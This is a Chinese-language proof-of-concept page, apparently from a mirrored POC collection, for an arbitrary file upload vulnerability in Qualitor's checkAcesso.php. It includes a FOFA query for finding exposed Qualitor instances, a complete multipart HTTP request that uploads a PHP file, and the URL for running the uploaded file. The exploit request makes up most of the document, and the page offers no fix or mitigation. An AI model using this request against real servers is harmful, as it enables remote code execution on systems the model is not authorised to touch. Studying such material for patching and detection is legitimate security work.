mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-06 10:56:07 +00:00
67 lines
2.1 KiB
Markdown
67 lines
2.1 KiB
Markdown
# Qualitor checkAcesso.php存在任意文件上传漏洞
|
|
|
|
# 一、漏洞简介
|
|
Qualitor checkAcesso.php存在任意文件上传漏洞
|
|
|
|
# 二、影响版本
|
|
+ Qualitor
|
|
|
|
# 三、资产测绘
|
|
+ fofa`app="Qualitor-Web"`
|
|
+ 特征
|
|
|
|
|
|
|
|
# 四、漏洞复现
|
|
```java
|
|
POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1
|
|
Host:
|
|
Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849
|
|
|
|
-----------------------------QUALITORspaceCVEspace2024space44849
|
|
Content-Disposition: form-data; name="idtipo"
|
|
|
|
2
|
|
-----------------------------QUALITORspaceCVEspace2024space44849
|
|
Content-Disposition: form-data; name="nmfilestorage"
|
|
|
|
|
|
-----------------------------QUALITORspaceCVEspace2024space44849
|
|
Content-Disposition: form-data; name="nmdiretoriorede"
|
|
|
|
.
|
|
-----------------------------QUALITORspaceCVEspace2024space44849
|
|
Content-Disposition: form-data; name="nmbucket"
|
|
|
|
|
|
-----------------------------QUALITORspaceCVEspace2024space44849
|
|
Content-Disposition: form-data; name="nmaccesskey"
|
|
|
|
|
|
-----------------------------QUALITORspaceCVEspace2024space44849
|
|
Content-Disposition: form-data; name="nmkeyid"
|
|
|
|
|
|
-----------------------------QUALITORspaceCVEspace2024space44849
|
|
Content-Disposition: form-data; name="fleArquivo"; filename="info.php"
|
|
|
|
<?php phpinfo();unlink(__FILE__);?>
|
|
-----------------------------QUALITORspaceCVEspace2024space44849
|
|
Content-Disposition: form-data; name="cdfilestorage"
|
|
|
|
|
|
-----------------------------QUALITORspaceCVEspace2024space44849--
|
|
```
|
|
|
|
|
|
|
|
```java
|
|
/html/ad/adfilestorage/request/info.php
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
> 更新: 2024-10-22 09:36:08
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yiooigqwix8pxlaz> |